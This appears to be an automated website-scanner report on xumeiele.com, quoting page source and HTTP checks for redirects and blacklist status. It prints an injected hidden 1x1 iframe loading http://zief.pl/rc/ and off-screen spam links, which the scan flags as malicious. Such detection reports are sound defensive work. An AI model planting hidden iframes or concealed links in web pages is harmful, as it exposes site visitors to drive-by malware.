Scanned pages/files
Request | Server response | Status |
http://xumeiele.com/ | 200 OK Content-Length: 26871 Content-Type: text/html | malicious |
Page code contains blacklisted domain: zief.pl ...[4382 bytes skipped]... ="http://www.miibeian.gov.cn/"></A> ¼¼ÊõÖ§³Ö£ºÐñÃÀ</FONT><br /></TD> </TR></TBODY></TABLE> <div style="position: absolute; top: -999px;left: -999px;"> <A href="http://www.zhuli98.com/" title="Íø׬ÂÛ̳">Íø׬ÂÛ̳</A> </script> <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"></iframe> <div style="position: absolute; top: -999px;left: -999px;"> <A href="http://www.zhuli98.com/" title="Íø׬ÂÛ̳">Íø׬ÂÛ̳</A> </BODY> </HTML> </script> Malicious iFrame found. The same iFrame was found in 18 websites. size: 1x1 src: http://zief.pl/rc/ This URL is marked by Google as suspicious <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://xumeiele.com/js/swfobject_source.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://xumeiele.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xumeiele.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 04 Oct 2014 17:00:17 GMT
Server: Microsoft-IIS/6.0
Content-Length: 26871
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQAQCDA=AEJGEPLDPAJKMHFMDDIMHBEF; path=/
X-Powered-By: ASP.NET
...26871 bytes of data.
GET / HTTP/1.1
Host: xumeiele.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 04 Oct 2014 17:00:17 GMT
Server: Microsoft-IIS/6.0
Content-Length: 26871
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQAQCDA=AEJGEPLDPAJKMHFMDDIMHBEF; path=/
X-Powered-By: ASP.NET
...26871 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xumeiele.com
Referer: http://www.google.com/search?q=xumeiele.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xumeiele.com
Referer: http://www.google.com/search?q=xumeiele.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xumeiele.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xumeiele.com/
Result: xumeiele.com is not infected or malware details are not published yet.
Result: xumeiele.com is not infected or malware details are not published yet.